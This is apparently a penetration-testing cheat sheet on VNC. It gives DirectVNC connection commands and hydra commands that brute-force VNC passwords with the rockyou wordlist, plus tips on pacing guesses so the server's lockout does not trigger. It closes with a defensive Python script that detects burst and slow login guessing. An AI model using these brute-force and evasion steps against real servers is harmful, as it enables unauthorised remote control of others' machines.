Virtual Network Computing (VNC) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse input from one computer to another, relaying the graphical-screen updates, over a network.
A viewer connects to a port on the server (default port: 5900), or a browser can connect to the server (default port: 5800). A server can also connect to a viewer in “listening mode” on port 5500. One advantage of listening mode is that the server site does not have to configure its firewall to allow access on port 5900 (or 5800); that duty falls on the viewer side, which is useful if the server site has no computer expertise and the viewer user is more knowledgeable.
DirectVNC (client / VNC viewer)
Installation
sudo apt install directvnc
Help
directvnc -h
Connection
directvnc $IP
directvnc $IP -p <password of VNC server>
Quit
[Ctrl] + q
Bruteforce
The VNC module does not take a username. Use a maximum of 4 threads, or you will get false negatives.
VNC does not have a login name. In older versions, no password policy could be set (no password complexity) and there was no blacklist feature. Newer versions have a blacklist feature that will block you after 5 failed login attempts. During penetration tests, increase the wait time per try in hydra (-W) to anything over 60. If you are attacking an older version of VNC, this blacklisting feature is not enabled by default.
- -w 5: This sets the wait time between tries. I have gone for 5 here, but remember to go a lot higher if the blacklisting feature is still enabled.
- -f: Quits once hydra has found a positive password match.
- -v: Verbose; this will display the password it tries in the terminal for each attempt.
IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
hydra -s 5900 -P $WL -t 4 $IP vnc
hydra -w 5 -f -v -s 5900 -P $WL -t 4 $IP vnc
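Detection
A defender-side view of the blacklist behaviour described above, as an added Python example that is not from the original page: it counts failed VNC logins per source with a burst rule and a long-window rule, because guesses paced more than a minute apart never trip a burst threshold. The log format, thresholds and addresses are constructed assumptions; adapt parse_line() to your VNC server's real log output.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed thresholds: (failure count, window). Tune to your environment.
BURST = (5, timedelta(minutes=1))   # mirrors a 5-failure blacklist
SLOW = (10, timedelta(hours=1))     # catches guesses paced over 60 s apart

def parse_line(line):
    """Parse '<ISO time> <source IP> <auth_failed|auth_ok>' (constructed format)."""
    ts, src, event = line.split()
    return datetime.fromisoformat(ts), src, event

def detect(lines):
    """Return {source_ip: set of rule names that fired} for time-ordered lines."""
    failures = defaultdict(list)
    alerts = defaultdict(set)
    for line in lines:
        ts, src, event = parse_line(line)
        if event != "auth_failed":
            continue
        failures[src].append(ts)
        for name, (limit, window) in (("burst", BURST), ("slow", SLOW)):
            recent = [t for t in failures[src] if ts - t <= window]
            if len(recent) >= limit:
                alerts[src].add(name)
    return dict(alerts)

def sample_log():
    """Constructed events: a fast guesser, a paced guesser, a user with one typo."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    stamp = lambda sec: (t0 + timedelta(seconds=sec)).isoformat()
    lines = []
    for i in range(6):     # 6 failures, 5 s apart
        lines.append(f"{stamp(5 * i)} 198.51.100.10 auth_failed")
    for i in range(12):    # 12 failures, 90 s apart: never 5 within a minute
        lines.append(f"{stamp(90 * i)} 198.51.100.20 auth_failed")
    lines.append(f"{stamp(0)} 192.0.2.30 auth_failed")
    lines.append(f"{stamp(20)} 192.0.2.30 auth_ok")
    return sorted(lines)   # ISO timestamps sort chronologically

if __name__ == "__main__":
    for src, rules in sorted(detect(sample_log()).items()):
        print(src, sorted(rules))
```

The paced source is only visible to the long-window rule, which is why a lockout counter alone is not sufficient monitoring for port 5900.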